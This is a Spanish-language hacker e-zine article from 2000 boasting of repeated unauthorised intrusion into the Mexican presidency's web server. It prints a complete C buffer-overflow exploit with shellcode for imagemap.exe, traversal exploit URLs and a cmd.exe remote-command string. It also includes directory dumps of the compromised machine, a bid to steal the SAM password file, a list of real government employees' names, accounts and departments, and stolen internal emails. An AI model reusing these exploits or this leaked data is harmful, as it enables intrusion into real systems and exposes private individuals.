============================================================================= --------------------------------------------------------------------------09- -----( Hackeando www.presidencia.gob.mx )------------------------------RM-11] -----[ alt3kx_H3z ]----------------------------[alt3kx_h3z@raza-mexicana.org] -= HACKEANDO PRESIDENCIA.GOB.MX =- www.presidencia.gob.mx por alt3kx! Comentarios alt3kx_h3z@raza-mexicana.org (c) 2000 alt3kx_h3z Definitivamente, los grandes servidores como el ke vamos a cometar contiene diferentes vunerabilidades sobre todo es aspectos de configuracion bajo el IIS (Internet information server ) y tambien en aspectos en servicios como el SAMBA y FTP, definitivamente estamos hablando de WITENDO (Windows NT 4.0 server en este caso). En este articulo trataremos de abarcar algunas vunearbilidades ke contiene o contenia este servidor llamado "www.presidencia.gob.mx", cabe mencionar que no mostrare los detallesa fondo, pues existen demasiados kiddies por ahi keriendo joder servidores y expresando mil y una idioteces, (ejemplo Cyberpunk y Machinfer) solo basta con visitar la pagina www.atrition.org pagina la cual se dedica a publicar las WEbcracks ke existen alrededor del mundo, Empezare explicando algunas vuenerabilidades que por a~os se han encontrado vigentes en este servidor, (digo por a~os pues he entrado varias veces al servidor sin ser detectado), bien inicio un scan localizando vunerabilidades: bash# ./a www.presidencia.gob.mx HTTPd version for www.presidencia.gob.mx HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://11.0.0.11/index.html Date: Thu, 09 Nov 2000 02:42:37 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Thu, 09 Nov 2000 00:53:48 GMT ETag: "0b6c284e749c01:217d" Bien en esta parte estamos detectando ke el servidor cuenta con el servicio de IIS version 4.0 ke por ende, deducimos que tiene abierto el puerto 80 el cual podemos ejecutar comandos si el servidor lo deja, en modo perl, en este modo algunos servidores pueden ejecutar comandos y la moyoria de los bugs se encuentra en las funciones de open() y system() sobre todo en servidores NT en el campo sobre la funciones en scripts de CGI (Comun Gateway Interface). En C, las funciones popen( ) y system( ) sirven para abrir un shell que procese los comandos que se le pasen como argumentos. Por su parte, en Perl, ademas de las funciones anteriores, se dispone de open( ) con tuberia o entubado "|", exec( ) y eval( ), asi como de las comillas hacia atras "`". peke~o ejemplo: exec("/usr/bin/ls","ls","/",0); <--podremos paginar la raiz si tenemos suerte en ekipos Linux o Unix. >Para mayor referencia leer "HACk PCWeek"< Bien el scan a localizado diferentes vunerabilidades bastante interesantes, las cuales nos podran dar accesso al este servidor :-) ... (1)/_vti_bin/shtml.dll : (2)/_vti_bin/shtml.exe : Estos dos servicios son proporcionados por FRONT PAGE en la mayoria de las versiones, el error (1) con suerte podremos llamar y paginar la raiz no en todos los casos funciona,para el error (2) existe un DoS (Denial Of Service) yo mismo he realizado el programa basado en perl para explotar esta vunerabilidad, basicamente existe un llamado en el puerto 80 con la cadena /_vti_bin/shtml.exe ejecutandoce remotamente en varias ocasiones causando asi ke el servidor no responda a la las peticiones y se colapse en tan solo unos minutos. Una vez ejecutado este script al recargar "Refresh" la pagina en tu browser, no desplegara nada, "Ellos veran las pantalla Azul jeje "Screen Death". El script ke hemos comentado se encuentran ne la siguientes webs con el siguiente nombre: fpage-DoS.pl http://www.raza-mexicana.org http://www.hertmx.org (3)/cgi-bin/imagemap.exe Otro error en servicios de FRONT PAGE , este ejecutable hace referencia a las imagenes ke puedan estar hospedadas en la web, basicamente el imagemap.exe se incluye en scripts bajo Java, Perl y algunos casos en php. En este error basicamente es un llamado para ejecutar comandos remotamente, con suerte podremos agregar un "dir" ejecutando la cadenasiguiente: "/winnt/system32/cmd.exe?/c+dir" Para este caso he logrado conseguir como se estructura el servidor: http://www.presidencia.gob.mx File C:\Inetpub\wwwroot\ The filename, directory name, or volume label syntax is incorrect Ahora sabemos ke la web se encuentra en la unidad C:\ en el directorio wwwroot este directorio es el default de los servicios de IIS. Aqui te proporciono el codigo fuente basado en c/c++ para ejecutar algunos comandos remotos donde hallas localizado el "imagemap.exe": ------------------------------------cortar------------------------- #include #include #include #include #define MAXBUF 2000 #define RETADR 348 #define JMPADR 344 #define HTTP_PORT 80 unsigned int mems[]={ 0xBFB50000, 0xBFB72FFF, 0xBFDE0000, 0xBFDE5FFF, 0xBFE00000, 0xBFE0FFFF, 0xBFE30000, 0xBFE42FFF, 0xBFE80000, 0xBFE85FFF, 0xBFE90000, 0xBFE95FFF, 0xBFEA0000, 0xBFF1EFFF, 0xBFF20000, 0xBFF46FFF, 0xBFF50000, 0xBFF60FFF, 0xBFF70000, 0xBFFC5FFF, 0xBFFC9000, 0xBFFE2FFF, 0,0}; unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe"; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } main(int argc,char *argv[]) { SOCKET sock; SOCKADDR_IN addr; WSADATA wsa; WORD wVersionRequested; unsigned int i,ip,p1,p2; static unsigned char buf[MAXBUF],packetbuf[MAXBUF+1000]; struct hostent *hs; if (argc<2){ printf("usage: %s VictimHost\n",argv[0]); return -1; } wVersionRequested = MAKEWORD( 2, 0 ); if (WSAStartup(wVersionRequested , &wsa)!=0){ printf("Winsock Initialization failed.\n"); return -1; } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ printf("Can not create socket.\n"); return -1; } addr.sin_family = AF_INET; addr.sin_port = htons((u_short)HTTP_PORT); if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); return -1; } addr.sin_family = hs->h_addrtype; memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length); } if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){ printf("Can not connect to specified host.\n"); return -1; } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; for (i=0;;i+=2){ if (mems[i]==0) return FALSE; if ((ip=search_mem((unsigned char *)mems[i], (unsigned char *)mems[i+1],0xff,0xe3))!=0) break; } buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR ]=0xeb; buf[JMPADR+1]=0x06; strcat(exploit_code,cmdbuf); p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x0d]=p1&0xff; exploit_code[0x0e]=(p1>>8)&0xff; exploit_code[0x0f]=(p1>>16)&0xff; exploit_code[0x10]=(p1>>24)&0xff; exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE; } ------------------------------------cortar------------------------- Los componentes afectados son HTIMAGE.EXE e IMAGEMAP.EXE, ke se ocupan de soportar el "image mapping" o "mapeado de imagenes" desde servidores compatibles con CERN y NCSA, respectivamente. A nivel practico, "imagemapping" integra los hiperenlaces dentro de las imagenes y permite crear enlaces en determinadas areas de un grafico. Un ejemplo tipico podria ser el de un mapa grafico en el ke, al seleccionar uno de los estados delimitados, nos traslada a otra pagina con informacion sobre la region escogida. La vulnerabilidad a la ke hoy nos referimos consiste en el conocido ataque por desbordamiento de bufer. En concreto, un excesivo tama~o en los argumentos que se les pasa como parametros a estos componentes, puede provocar el acceso no controlado a la memoria del sistema. Una vez que se produce el desbordamiento de bufer, los datos sobrantes que acceden de forma descontrolada a la memoria pueden bloquear el sistema si no pueden interpretarse como comandos o ejecutarse las instrucciones que representan. Una solucion ke propone Microsoft (muy peke~a) es la eliminacion de estos archivos,mediante una buskeda sencilla como dar "Buscar"-- "Archivos y carpetas" con los nombres de imagemap.exe y htimage.exe . La perdida de estos archivos afectar solo a la funcionalidad cuando se utilicen hiperenlaces graficos tipo CERN O NCSA y el cliente mantenga un navegador muy antiguo, lo ke es muy poco probable. (4)/Default.asp Error en scripts de ASP (Active Server Page), los ASP basicamente se usan en formularios y servicios para base de datos, en los personal los he manejado poko, pues ya no he programado sobre ASP, pero podemos entender ke se hospedan en los servicios del IIS por default,con ASP podremos lograr demasiadas cosas, lo importante de los ASP es lograr ver el codigo fuente para asi insertar cadenas. Hablando un poco sobre el error (4), existe la manera de tener acceso a los archivos del sistema remotamente, el trabajo consiste en localizar los directorios posibles para ejecucion, el problema es causado por el IIS, que no verifica la autentificacion sobre los camandos transcritos sobre el servicio, el error es basicamente agregar comandos para obtener respuesta del servidor ejemplo: http://www.presidencia.gob.mx/default.asp%20.pl IIS recibe esta respuesta y asume ke es para un perl script, perl cuando recive la instruccion para ejecutar default.asp, deja pasarla como una instruccion con extension.pl, con esto podremos enga~ar al servidor para ejecutar algunos otros comandos ejemplo: http://www.presidencia.gob.mx/passwd.txt%20.pl Si tenemos suerte podremos obtener un error como este: C:\Inetpub\scripts\passwd.txt line 1 Algunos ejemplos en ASP: [Codebrws.asp]: Originalmente localizado en la siguiente ruta: /iissamples/exair/howitworks/codebrws.asp? Exploit: SERVER/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../../../../ARCHIVO [Showcode.asp]: Originalmente localziado en la siguiente ruta: /msadc/samples/selector/showcode.asp Exploit: SERVER/msadc/samples/selector/showcode.asp?source=/msadc/Samples/../../../../../ARCHIVO Codigo fuente del ASP (showcode.asp) -------------------------------------------------------------------------------- ") Response.Write("") strLine = Right(strLine, Len(strLine) - (iPos + 8)) Call PrintLine(strLine, fCheckLine(strLine)) Case Else Response.Write("FUNCTION ERROR -- PLEASE CONTACT ADMIN.") End Select END SUB <% strVirtualPath = Request("source") %> View Active Server Page Source
Active Server Page logo View ASP Source
Go Back to <%=strVirtualPath%>
<% If fValidPath(strVirtualPath) Then strFilename = Server.MapPath(strVirtualPath) Set FileObject = Server.CreateObject("Scripting.FileSystemObject") Set oInStream = FileObject.OpenTextFile (strFilename, 1, FALSE ) While NOT oInStream.AtEndOfStream strOutput = oInStream.ReadLine Call PrintLine(strOutput, fCheckLine(strOutput)) Response.Write("
") Wend Else Response.Write("

View Active Server Page Source-- Access Denied

") End If %> >Lectura recomendada ASP PROGRAMING MS< (5)/msadc/msadcs.dll Se ha comentado mucho sobre este error en varias ocasiones por lo cual solo hare referencia al articulo ke realizo _0x90_ en la e-zine de raza-mexicana en el raza#10, Te pongo la direccion exacta para ke puedas leer este buen articulo: http://www.raza-mexicana.org/revista/html/raza10-2.html#iisrds He puesto las vunerabilidades mas conocidas he importantes sobre este servidor, a partir de este momento posteare algunos archivos ke se encuentran en los directorios mas importantes bajo el el servidor NT 4.0 con servicio IIS 4.0 del servidor www.presidencia.gob.mx. Tecleando C:\dir C:\Inetpub\scripts se localiza lo siguiente: Directory of C:\Inetpub\scripts10/28/00 07:31p . 10/28/00 07:31p .. 04/07/99 08:57p buscar 4 File(s) 208,144 bytes 579,322,880 bytes free Tecleando C:\dir C:\Inetpub se localiza lo siguiente: Directory of c:\Inetpub 10/05/00 11:48p . 10/05/00 11:48p .. 10/27/00 01:12p catesp 08/31/00 12:53p catexp 10/27/00 01:13p cating 04/07/99 10:40p catkids 12/24/99 12:01p iissamples 06/03/99 01:31p Repaldos 10/28/00 07:31p scripts 10/24/00 09:03a wwwroot 10 File(s) 0 bytes 579,322,880 bytes free Kiero ver ke hay desde raiz :-) Tecleando C:\dir C:\ se localiza lo siguiente: Directory of c:\10/16/00 08:02p Almacen 03/31/99 05:00a 0 AUTOEXEC.BAT 03/31/99 05:00a 0 CONFIG.SYS 09/03/00 03:41p especial 09/02/00 08:14p 372 FRONTPG.LOG 10/05/00 11:48p Inetpub 04/07/99 09:12p List 10/24/00 06:36p 67,108,864 pagefile.sys 04/05/99 11:42a php3 08/31/00 08:36p Program Files 07/19/99 12:03p ssinst 04/05/00 10:17a StatisticsServer 10/28/00 10:23a TEMP 10/28/00 07:38p WINNT 10/28/00 10:25a 469,869 winzip.log 15 File(s) 67,579,105 bytes 579,322,880 bytes free Tecleando C:\dir C:\WINNT se localiza lo siguiente: Directory of c:\WINNT10/28/00 07:38p . 10/28/00 07:38p .. 02/17/98 10:51a 20,480 aceclcab.exe 02/17/98 10:53a 690,534 aceclnt.cab 08/31/00 08:30p 6,305 Active Setup Log.BAK 08/31/00 08:38p 10,018 Active Setup Log.txt 08/31/00 08:30p 0 AdvpackExt.BAK 08/31/00 08:36p 0 AdvpackExt.log 03/29/99 01:16p 21,590 Bind List Log.txt 10/13/96 07:38p 5,328 black16.scr 03/29/99 01:15p CatRoot 05/08/98 12:00a 84,032 Channel Screen Saver.SCR 10/13/96 07:38p 82,944 clock.avi 12/29/98 11:54p 49,424 clspack.exe 12/24/99 12:01p cm32 03/31/99 04:49a Config 03/31/99 05:00a 0 control.ini 03/29/99 01:14p COOKIES 08/31/00 08:37p Cursors 09/11/00 07:24p 1,576,127 drwtsn32.log 11/18/99 11:04a 237,328 EXPLORER.EXE 05/08/98 12:00a 103,424 EXTRAC32.EXE 08/31/00 08:37p 100,864 extract.exe 03/29/99 01:28p 276 frontpg.ini 04/08/00 10:05a Help 08/31/00 08:37p 26,896 hh.exe 03/29/99 01:14p History 03/29/99 01:15p 128,985 IE4 Setup Log.Txt 11/18/99 11:04a 150,898 IEHELP.EXE 08/31/00 08:37p 17,655 iextract.exe 12/29/98 11:07p 6,550 jautoexp.dat 05/18/98 12:00a 14,017 JAUTOEXP.INI 03/29/99 01:20p Java 07/04/99 10:55a 1,729 javainst.log 12/29/98 11:51p 169,232 jview.exe 10/13/96 07:38p 157,044 lanma256.bmp 10/13/96 07:38p 157,044 lanmannt.bmp 07/04/99 11:52a 2,670 MDACSET.log 10/19/00 01:27p 185 mdm.ini 04/08/00 10:05a Media 10/27/00 09:47p 165 mmc.INI 05/28/99 11:25a Mon 07/05/99 02:31p msapps 11/03/97 04:48p 1,405 MSDFMAP.INI 03/29/99 01:31p 16,384 MSIMGSIZ.DAT 12/19/96 12:00a 49,094 MSO97.ACL 10/13/96 07:38p 67,328 network.wri 10/13/96 07:38p 45,328 NOTEPAD.EXE 10/24/00 06:27p 2,304 ODBC.INI 08/31/00 08:52p 5,702 ODBCINST.INI 08/15/98 01:53p 2,780 php3.ini 11/18/99 11:04a 123,152 POLEDIT.EXE 10/13/96 07:38p 34,816 printer.wri 03/29/99 11:04a Profiles 08/30/99 03:43a Proyectos 10/13/96 07:38p 71,952 REGEDIT.EXE 07/23/98 02:18p 40,960 REGTLIB.EXE 04/06/99 12:01p repair 03/29/99 01:20p 20,034 RunOnceEx Log.txt 03/29/99 01:22p Samples 09/11/99 05:17p 1,004 scsE0.tmp 12/29/98 11:53p 46,352 setdebug.exe 04/08/00 10:05a 308 setup.old 08/31/00 04:33p 286,720 Setup1.exe 03/29/99 11:01a 138 setuplog.txt 03/29/99 01:16p 956 Soft Boot Log.txt 08/31/00 04:33p 73,216 ST6UNST.EXE 03/29/99 01:20p Subscriptions 08/31/00 08:30p system 10/13/96 07:38p 219 system.ini 10/24/00 06:36p system32 10/13/96 07:38p 32,016 TASKMAN.EXE 03/29/99 01:20p Temporary Internet Files 09/11/00 07:25p 110,539,070 user.dmp 07/04/99 11:08a 1,245 VB.INI 10/24/00 06:39p 62 VBAddin.INI 08/31/00 08:54p VBE 07/04/99 11:42a 2,659 vminst.log 10/13/96 07:38p 24,336 vmmreg32.dll 03/29/99 01:16p Web 10/13/96 07:38p 22,288 welcome.exe 10/28/00 10:29a 423 WIN.INI 10/13/96 07:38p 3 WINFILE.INI 10/13/96 07:38p 256,192 WINHELP.EXE 11/18/99 11:04a 311,056 WINHLP32.EXE 12/29/98 11:52p 162,576 wjview.exe 07/04/99 11:08a 0 wplog.txt 10/13/96 07:38p 707 _DEFAULT.PIF 07/03/00 11:36a 0 ~DF1026.tmp 07/14/99 11:52a 0 ~DF11A2.tmp 01/01/00 12:03a 0 ~DF17A.tmp 09/02/00 08:00p 0 ~DF1BED.tmp 09/03/00 01:36p 0 ~DF30.tmp 09/02/00 08:12p 0 ~DF315D.tmp 11/14/99 04:56p 0 ~DF3DEB.tmp 06/08/00 03:47p 0 ~DF42C4.tmp 03/29/99 07:08p 0 ~DF5F3F.tmp 09/02/00 08:22p 0 ~DF61F7.tmp 04/06/99 09:49a 0 ~DF63C8.tmp 09/02/00 08:22p 0 ~DF654A.tmp 09/04/00 11:28a 0 ~DF731F.tmp 04/06/99 10:19a 0 ~DF7382.tmp 04/06/99 11:04a 0 ~DF8C6D.tmp 10/24/00 06:17p 0 ~DFA8E.tmp 03/29/99 01:30p 0 ~DFB853.tmp 10/06/00 11:53a 0 ~DFBA7A.tmp 05/11/99 01:35p 0 ~DFBD0F.tmp 04/07/99 07:51p 0 ~DFBF40.tmp 05/07/99 10:08a 0 ~DFC2ED.tmp 11/25/99 03:19p 0 ~DFCC29.tmp 09/04/00 05:30p 0 ~DFD410.tmp 02/23/00 11:23p 0 ~DFD6A5.tmp 04/05/99 09:25a 0 ~DFD73.tmp 12/06/99 07:01p 0 ~DFD849.tmp 07/14/99 11:00a 0 ~DFDB4C.tmp 10/06/99 06:50p 0 ~DFDC15.tmp 05/11/99 01:40p 0 ~DFDDB9.tmp 07/20/99 11:33a 0 ~DFDF72.tmp 09/17/00 04:00p 0 ~DFE17B.tmp 06/08/99 01:32p 0 ~DFE24D.tmp 05/12/99 08:51a 0 ~DFE2D9.tmp 06/25/00 07:24p 0 ~DFE379.tmp 07/04/99 11:46a 0 ~DFE56E.tmp 05/26/99 07:08p 0 ~DFE5DC.tmp 06/08/99 11:10p 0 ~DFE65E.tmp 05/11/99 12:25p 0 ~DFE668.tmp 03/08/00 08:20p 0 ~DFE6A4.tmp 08/10/00 08:18p 0 ~DFE6FF.tmp 05/07/99 09:53p 0 ~DFE709.tmp 05/04/99 08:49p 0 ~DFE795.tmp 06/17/99 10:34a 0 ~DFE817.tmp 05/07/99 09:18a 0 ~DFE821.tmp 09/25/00 10:38a 0 ~DFE83F.tmp 04/10/99 01:13p 0 ~DFE989.tmp 08/31/00 05:14p 0 ~DFEA3E.tmp 07/04/99 10:59a 0 ~DFEAB6.tmp 07/04/99 11:55a 0 ~DFEAFC.tmp 08/25/99 08:23p 0 ~DFEBCE.tmp 11/14/99 03:39p 0 ~DFEBF6.tmp 03/01/00 09:35p 0 ~DFED23.tmp 10/05/99 07:30p 0 ~DFEDF5.tmp 07/04/99 11:12a 0 ~DFEE1D.tmp 04/08/99 12:01a 0 ~DFEE3B.tmp 04/14/99 10:03p 0 ~DFEF22.tmp 04/22/99 11:22a 0 ~DFEF5E.tmp 08/26/99 08:27p 0 ~DFEF5F.tmp 08/31/99 12:49a 0 ~DFEFC2.tmp 08/03/99 07:26p 0 ~DFEFE0.tmp 04/10/99 01:09p 0 ~DFEFF4.tmp 07/21/99 11:19p 0 ~DFF207.tmp 12/30/99 11:11p 0 ~DFF473.tmp 03/29/99 06:54p 0 ~DFF528.tmp 03/04/00 12:43a 0 ~DFF55A.tmp 03/03/00 10:46p 0 ~DFF5DC.tmp 11/22/99 04:46p 0 ~DFF5FA.tmp 03/29/99 07:00p 0 ~DFF781.tmp 08/31/00 02:26p 0 ~DFF79F.tmp 08/31/00 02:40p 0 ~DFF7F9.tmp 10/24/00 06:36p 0 ~DFF867.tmp 08/31/00 10:42p 0 ~DFF92F.tmp 04/07/99 11:49p 0 ~DFF94D.tmp 08/31/00 07:49p 0 ~DFF9C5.tmp 09/04/00 11:41a 0 ~DFF9D9.tmp 08/30/00 06:20p 0 ~DFF9EE.tmp 09/04/00 05:36p 0 ~DFFA5C.tmp 08/24/00 12:32a 0 ~DFFA7A.tmp 02/18/00 04:21p 0 ~DFFAB6.tmp 08/31/00 04:58p 0 ~DFFB60.tmp 04/06/00 07:16p 0 ~DFFB7E.tmp 03/02/00 08:39p 0 ~DFFBD8.tmp 09/12/00 07:26p 0 ~DFFBD9.tmp 12/24/99 01:07p 0 ~DFFBE2.tmp 10/21/00 10:02a 0 ~DFFC14.tmp 08/31/00 08:45p 0 ~DFFC1E.tmp 08/31/00 12:46p 0 ~DFFC3C.tmp 09/11/00 07:43p 0 ~DFFC6E.tmp 09/18/00 05:36p 0 ~DFFC6F.tmp 01/25/00 03:27p 0 ~DFFC82.tmp 08/28/00 09:56a 0 ~DFFCBF.tmp 03/03/00 10:20p 0 ~DFFCE7.tmp 09/04/00 01:41p 0 ~DFFD2D.tmp 03/04/00 12:31a 0 ~DFFD55.tmp 08/03/99 10:02p 0 ~DFFDAF.tmp 01/14/00 10:03a 0 ~DFFDB9.tmp 10/07/00 10:58a 0 ~DFFDBA.tmp 09/15/00 12:29p 0 ~DFFDC3.tmp 04/07/99 09:21p 0 ~DFFDEB.tmp 05/05/00 09:57a 0 ~DFFE1D.tmp 04/05/99 09:39a 0 ~DFFE81.tmp 09/04/00 06:32p 0 ~DFFEBD.tmp 10/05/00 09:58a 0 ~DFFF53.tmp 07/05/00 10:27p ~offfilt 09/02/00 08:22p 42,496 ~WRC0000.tmp 09/02/00 08:01p 1,536 ~WRF0000.tmp 194 File(s) 116,108,561 bytes 579,322,880 bytes free Robemos el sam._ :-) Tecleando C:\dir C:\WINNT\repair se localiza lo siguiente: c:\winnt\repair01/01/00 04:24a . 01/01/00 04:24a .. 10/14/96 03:38a 438 autoexec.nt 01/01/00 04:29a 2,510 config.nt 01/01/00 04:31a 15,508 default._ 01/01/00 04:31a 14,768 ntuser.da_ 01/01/00 04:31a 3,511 sam._ 01/01/00 04:31a 6,393 security._ 01/01/00 04:31a 131,946 software._ 01/01/00 04:31a 85,390 system._ 10 File(s) 260,464 bytes Tecleando C:\dir C:\Inetpub\scripts\buscar se localiza lo siguiente: Directory of c:\Inetpub\scripts\buscar 04/07/99 08:57p . 04/07/99 08:57p .. 09/17/98 07:28p 2,668 basica.htm 05/22/98 09:44p 10,150 basica.htx 09/26/98 12:23a 518 basica.idq 09/17/98 07:32p 2,668 basica1.htm 07/03/98 12:09p 10,181 Basicaex.htx 09/26/98 12:23a 522 Basicaex.idq 09/17/98 07:38p 1,504 basicaResp.htm 09/17/98 07:38p 1,504 Copia de basicafuera.htm 09/17/98 07:28p 2,005 query.htm 04/06/99 10:04a _vti_cnf 12 File(s) 31,720 bytes 579,322,880 bytes free Kiero ver ke hay en el Program Files :-) Tecleando C:\dir C:\progra~1 se localiza lo siguiente: Directory of c:\progra~1 08/31/00 08:36p . 08/31/00 08:36p .. 07/04/99 11:05a Common Files 10/24/00 04:46p Explora 12/24/99 12:00p MarkVis 03/29/99 01:28p Microsoft FrontPage 08/31/00 08:33p Microsoft Office 03/29/99 01:26p Microsoft Script Debugger 07/04/99 11:07a Microsoft Visual Studio 12/24/99 12:02p Mts 03/11/00 01:28p NT OBJECTives, Inc 08/31/00 08:33p Office2000 03/29/99 11:01a Plus! 07/12/99 02:43p Respaldos 07/04/99 11:07a Web Publish 03/14/00 11:23a WEBTREND 04/08/00 10:05a Windows NT 09/06/99 10:53a WinZip 18 File(s) 0 bytes 579,257,344 bytes free K00l tienen Office2000, Front Page, y Winzip :X Kiero saber ke hay en Microsoft FrontPage Tecleando C:\dir C:\progra~1\micros~1 se localiza lo siguiente: Directory of c:\progra~1\micros~1 03/29/99 01:28p . 03/29/99 01:28p .. 03/29/99 01:28p 551 FrontPage Server Administrator.lnk 03/29/99 01:28p temp 03/29/99 01:28p version3.0 5 File(s) 551 bytes 579,191,808 bytes free Kiero saber ke hay dentro de version3.0 Tecleando C:\dir C:\progra~1\micros~1\version3.0 se localiza lo siguiente: Directory of c:\progra~1\micros~1\version3.0 03/29/99 01:28p . 03/29/99 01:28p .. 03/29/99 01:26p admin 03/29/99 01:26p bin 03/29/99 01:26p isapi 03/29/99 01:26p serk 03/28/00 08:58p servsupp 03/29/99 01:28p temp 03/29/99 01:28p _vti_bin 9 File(s) 0 bytes 579,191,808 bytes free ------------------------------------------------------------- Algunos Mails/Usuarios sobre el dominio presidencia.gob.mx ------------------------------------------------------------- Account Name :abc@presidencia.gob.mx The abc account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :Secretaria Privada User Comment : Full name :anonimo Account Name :abrun@presidencia.gob.mx The abrun account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :Consejeria Juridica User Comment : Full name :Ana Brun I~arritu Account Name :acast@presidencia.gob.mx The acast account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon. Comment :Prospectiva y Proyectos Especiales User Comment : Full name :Akram Daniel Castillo Cardenas Account Name :acontla@presidencia.gob.mx The acontla account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :CAC - Coord. Admiva. User Comment : Full name :Alejandro Contla Hosking Account Name :Administrator The Administrator account is an ADMINISTRATOR, and the password was changed 0 days ago. This account has been used 847 times to logon. The default Administrator account has not been renamed. Consider renaming this account and removing most of its rights. Use a differnet account as the admin account. Comment :Built-in account for administering the computer/domain User Comment : Full name : Account Name :afernand@presidencia.gob.mx The afernand account is a normal USER, and the password was changed 0 days ago. This account has been used 4 times to logon. Comment :Politica User Comment : Full name :Alejandra Fernandez Wong Account Name :afrias@presidencia.gob.mx The afrias account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :DGCS - Publicaciones User Comment : Full name :Alfonso Manuel Frias Badillo Account Name :agomez@presidencia.gob.mx The agomez account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :Consejeria Juridica User Comment : Full name :Alfredo Gomez Aguirre Account Name :agomezg@presidencia.gob.mx The agomezg account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :DGCS - Analisis y Evaluacion User Comment : Full name :Andres Gomez Glokner Account Name :agonzale@presidencia.gob.mx The agonzale account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment :CAC - DGPA User Comment : Full name :Angel Gonzalez Amozorrutia Account Name :WWW$ The caltamir account is a normal USER, and the password was changed 0 days ago. This account has been used 0 times to logon. Comment : User Comment : Full name : Un mail ke por ahi me he hurtado solo para saber como van las cosas :-) **************************************************************************** +OK Microsoft Exchange POP3 server version 5.5.2650.23 ready +OK +OK User successfully logged on Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidencia.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id VCFMTPYN; Tue, 17 Oct 2000 07:58:59 +0100 Message-ID: <39EC4D44.144F4269@presidencia.gob.mx> Date: Tue, 17 Oct 2000 07:59:48 -0500 From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= X-Mailer: Mozilla 4.5 [es] (Win98; I) X-Accept-Language: es MIME-Version: 1.0 To: usuarios@presidencia.gob.mx Subject: Cambio de Servidor de Correo Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Debido a que fue necesario cambiar el servidor de correo por uno de mas capacidad, es posible que en este cambio se hayan perdido algunos correos, tanto al recibir como al enviar. Por lo cual le sugerimos reenviar o solicitar aquellos correos que ud. considere importantes. Asi mismo se les informa que durante el dia de hoy puede haber problemas en la recepcion de correos debido a que los cambios realizados tardan aproximadamente 24 horas en ser difundidos en internet. por su comprension gracias. . ***************************************************************************** +OK Microsoft Exchange POP3 server version 5.5.2650.23 ready +OK +OK User successfully logged on Received: from presidencia.gob.mx (OCTAVIANO [200.23.123.37]) by mail.presidenci a.gob.mx with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21 ) id VYCDD7WK; Tue, 14 Nov 2000 22:33:04 -0000 Message-ID: <3A120416.D5350062@presidencia.gob.mx> Date: Tue, 14 Nov 2000 22:33:43 -0500 From: Octaviano =?iso-8859-1?Q?Hern=E1ndez?= X-Mailer: Mozilla 4.5 [es] (Win98; I) X-Accept-Language: es MIME-Version: 1.0 To: usuarios@presidencia.gob.mx Subject: Nuevo Virus Content-Type: multipart/alternative; boundary="------------68EDA2B8A569812A6DD1AA9A" --------------68EDA2B8A569812A6DD1AA9A Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit ???? CUIDADO !!!! NO ABRAN EL MAIL CON EL ARCHIVO ADJUNTO "NAVIDAD.EXE ", NO IMPORTA SI SE LOS MANDA ALGUIEN CONOCIDO, ESTE VIRUS BLOQUEA LA COMPUTADORA Y SE AUTO MANDA A TODOS LOS DESTINATARIOS DE LA LIBRETA DE DIRECCIONES. . --------------68EDA2B8A569812A6DD1AA9A Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit ???? CUIDADO !!!!

NO ABRAN EL MAIL CON EL ARCHIVO ADJUNTO "NAVIDAD.EXE ",
